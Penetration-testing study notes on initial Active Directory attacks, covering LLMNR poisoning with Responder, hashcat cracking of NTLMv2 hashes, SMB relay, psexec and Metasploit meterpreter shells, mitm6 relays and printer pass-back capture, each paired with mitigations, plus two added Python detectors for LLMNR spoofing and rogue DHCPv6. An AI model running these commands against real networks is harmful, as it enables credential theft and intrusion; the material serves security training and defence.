Attacking Active Directory: Initial Attack Vectors

An overview of attack vectors that can be used to compromise Active Directory environments. It covers techniques such as LLMNR poisoning, SMB relay attacks and IPv6-based attacks, with the requirements, steps and mitigation strategies for each. It also discusses how to gain shell access using tools like Metasploit and psexec. The document serves as a guide for security professionals and penetration testers to understand and defend against these initial attack vectors targeting Active Directory infrastructure.

2021/2022. Uploaded on 06/04/2024 by abad-hussain.


Attacking Active Directory:

Initial Attack Vectors

Eslam Hassan

LLMNR Poisoning:

LLMNR (Link-Local Multicast Name Resolution) is used to identify hosts when DNS fails; previously NBT-NS. The key flaw is that services send the username and NTLMv2 hash when they receive an appropriately crafted response (and we can intercept that).

Requirements:

  1. LLMNR must be enabled
  2. We need to run this early in the morning or after lunch, when people are logging into their computers

Steps:

  1. Run the Responder tool in Kali. Responder is going to respond to traffic.
       ip a                                                          # note the interface
       sudo python /usr/share/responder/Responder.py -I eth0 -dwPv
     or
       sudo responder -I eth0 -dwP
     (use -I tun0 if you are using a VPN/tunnel)
  2. Obtain hashes and crack them using Hashcat
       hashcat -m 5600 ntlmhash.txt rockyou.txt                     # -m 5600 for NTLMv2; ntlmhash.txt contains the hashes
       .\hashcat.exe -m 5600 .\hash.txt .\wordlist.txt --show        # --show prints the cracked passwords
     You can use rules: -r OneRule

Mitigation:
  Disable LLMNR and NBT-NS
  Require Network Access Control
  Use a strong password policy
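Added example (not part of the original notes): a small LLMNR canary in Python that a defender can run from a workstation. It queries a random hostname that cannot exist, so a healthy network stays silent and any answer identifies the host that is poisoning LLMNR. It assumes Python 3.8+, that outbound multicast goes out the default interface, and that replies to the ephemeral source port are not firewalled.

```python
import os, random, socket, struct
LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355   # RFC 4795 multicast group and port

def build_llmnr_query(name: str, txid: int) -> bytes:
    # Same wire format as a DNS query: header with flags 0 and QDCOUNT 1, then QNAME, QTYPE=A, QCLASS=IN
    qname = b"".join(bytes([len(p)]) + p.encode("ascii") for p in name.split(".")) + b"\x00"
    return struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0) + qname + struct.pack("!HH", 1, 1)

def _skip_name(data: bytes, off: int) -> int:
    while data[off] and data[off] & 0xC0 != 0xC0:   # walk labels until the 0 terminator or a pointer
        off += 1 + data[off]
    return off + (2 if data[off] else 1)

def parse_llmnr_response(data: bytes, txid: int):
    # Returns the IPv4 answers, or None if this is not a well-formed response to our transaction id
    try:
        rid, flags, qd, an, _, _ = struct.unpack("!HHHHHH", data[:12])
        if rid != txid or not flags & 0x8000:        # QR bit must be set
            return None
        off, addrs = 12, []
        for _ in range(qd):
            off = _skip_name(data, off) + 4          # skip QTYPE and QCLASS
        for _ in range(an):
            off = _skip_name(data, off)
            rtype, _, _, rdlen = struct.unpack("!HHIH", data[off:off + 10])
            if rtype == 1 and rdlen == 4:
                addrs.append(socket.inet_ntoa(data[off + 10:off + 14]))
            off += 10 + rdlen
        return addrs
    except (struct.error, IndexError):               # truncated or malformed packet
        return None

def probe(timeout: float = 2.0) -> list:
    # Ask for a random name that cannot exist; any host answering it is poisoning LLMNR
    name, txid = "canary-" + os.urandom(4).hex(), random.getrandbits(16)
    hits = []
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_llmnr_query(name, txid), (LLMNR_GROUP, LLMNR_PORT))
        try:
            while True:
                data, (src, _) = s.recvfrom(512)
                if (addrs := parse_llmnr_response(data, txid)):
                    hits.append((src, addrs))
        except socket.timeout:                       # silence means nobody spoofed this round
            pass
    return hits

if __name__ == "__main__":
    print(probe() or "no LLMNR spoofer answered")    # hits are (source_ip, [addresses]) pairs
```

Run it on a schedule (the notes say poisoning is typically run at logon peaks) and alert on any non-empty result.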

SMB Relay:

Instead of cracking hashes gathered with Responder, we can relay those hashes to specific machines and gain access.

Requirements:
  Someone must log in to or access our machine, \10.0.2.
  SMB signing must be disabled on the target (or not enforced)
  The relayed user's credentials must be admin on the machine (local admin on their machine)

Steps:
  1. Discover hosts with SMB signing disabled
       nmap --script=smb2-security-mode.nse -p445 192.168.57.0/24 -Pn
     We need to note down machines with 'message signing enabled but not required'.
       vim targets.txt                      # add target IPs
  2. Edit the Responder config: turn SMB and HTTP off, because we need to make sure that these captures are relayed
       vim /etc/responder/Responder.conf    # turn SMB, HTTP off
       SMB = Off
       HTTP = Off

Mitigation:
  Enable SMB signing on all devices
    pro: completely stops the attack
    con: can cause performance issues with file copies
  Disable NTLM authentication on the network
    pro: completely stops the attack
    con: if Kerberos stops working, Windows defaults back to NTLM
  Account tiering
    Limit domain admins to specific tasks
  Local admin restriction, to prevent lateral movement
    con: potential increase in the amount of service desk tickets

Gaining Shell Access:

  1. Through Metasploit
     a. We can log in with a domain account (pparker)
     b. Or we can log in to a local account with an NTLM hash
     This step has to be done once we have the credentials.
       msfconsole
       search psexec
       use exploit/windows/smb/psexec
       options                              # set all required options, such as RHOSTS, smbdomain, smbpass and smbuser
       set payload windows/x64/meterpreter/reverse_tcp
       show
       set LHOST eth

  Try multiple options if these tools do not work (blocked), such as smbexec and wmiexec.

IPv6 Attacks (refer to mitm6 attacks and NTLM relays for more info):

  1. start the ntlmrelay
  2. start the mitm6 and wait
  3. action happens (a user reboot or relogin)
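Added example (not from the original notes), from the detection side of the steps above: mitm6 takes over name resolution by answering DHCPv6 with itself as the DNS server, so a defender can flag any DHCPv6 Advertise/Reply whose DNS server option points outside the allowlist. This Python parser works on raw DHCPv6 payloads handed to it from whatever capture feed is available (feeding a live capture is outside the block); the SAMPLE_ADVERTISE bytes and the addresses fe80::dead:beef and 2001:db8::53 are constructed for the example.

```python
import socket, struct

DHCPV6_ADVERTISE, DHCPV6_REPLY = 2, 7   # server->client message types (RFC 8415)
OPT_DNS_SERVERS = 23                    # DNS Recursive Name Server option (RFC 3646)

def parse_dhcpv6_dns_servers(pkt: bytes):
    # Returns (msg_type, [DNS servers offered]) or None if the message is malformed
    if len(pkt) < 4:                    # 1-byte msg-type + 3-byte transaction-id
        return None
    servers, off = [], 4
    while off < len(pkt):
        if off + 4 > len(pkt):          # option header must be complete
            return None
        code, length = struct.unpack("!HH", pkt[off:off + 4])
        body = pkt[off + 4:off + 4 + length]
        if len(body) != length:         # option body runs past the end of the packet
            return None
        if code == OPT_DNS_SERVERS:
            if length % 16:
                return None
            servers += [socket.inet_ntop(socket.AF_INET6, body[i:i + 16]) for i in range(0, length, 16)]
        off += 4 + length
    return pkt[0], servers

def rogue_dns_servers(pkt: bytes, allowed: set) -> list:
    # DNS servers pushed by an Advertise/Reply that are not on the corporate allowlist
    parsed = parse_dhcpv6_dns_servers(pkt)
    if parsed is None or parsed[0] not in (DHCPV6_ADVERTISE, DHCPV6_REPLY):
        return []
    return [s for s in parsed[1] if s not in allowed]

def scan(captured, allowed: set) -> list:
    # captured: iterable of (source_ip, dhcpv6_payload) pairs from whatever capture feed is available
    alerts = []
    for src, pkt in captured:
        for bad in rogue_dns_servers(pkt, allowed):
            alerts.append(f"ALERT: {src} offered unexpected DNS server {bad}")
    return alerts

# Constructed sample: an Advertise (type 2) whose only option is DNS_SERVERS = fe80::dead:beef
SAMPLE_ADVERTISE = (bytes([DHCPV6_ADVERTISE, 0x12, 0x34, 0x56])
                    + struct.pack("!HH", OPT_DNS_SERVERS, 16)
                    + socket.inet_pton(socket.AF_INET6, "fe80::dead:beef"))

if __name__ == "__main__":
    for line in scan([("fe80::dead:beef", SAMPLE_ADVERTISE)], {"2001:db8::53"}):
        print(line)
```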

  ls lootme                    # contains useful info
  If we keep the program running in the background and a user logs in, the creds can be captured.

Mitigation:
  Block DHCPv6 traffic and incoming router advertisements
  Disable WPAD via Group Policy
  Enable both LDAP signing and LDAP channel binding
  Mark admin users as Protected Users or sensitive accounts

Pass-Back attacks can be used for printer hacking:

  1. Replace LDAP attributes: we removed the existing LDAP server address, 192.168.1.100, and replaced it with our IP address
  2. Create a Netcat listener on port 389, which was the existing port in the LDAP settings of the MFP (or use Responder)
  3. Capture credentials

Initial internal attack strategy

  1. Begin the day with mitm6 or Responder
  2. Run scans to generate traffic
  3. If scans are taking too long, look for websites in scope (http_version)
  4. Look for default creds on web logins
     a. printers
     b. Jenkins
     c. etc.
  5. Think outside the box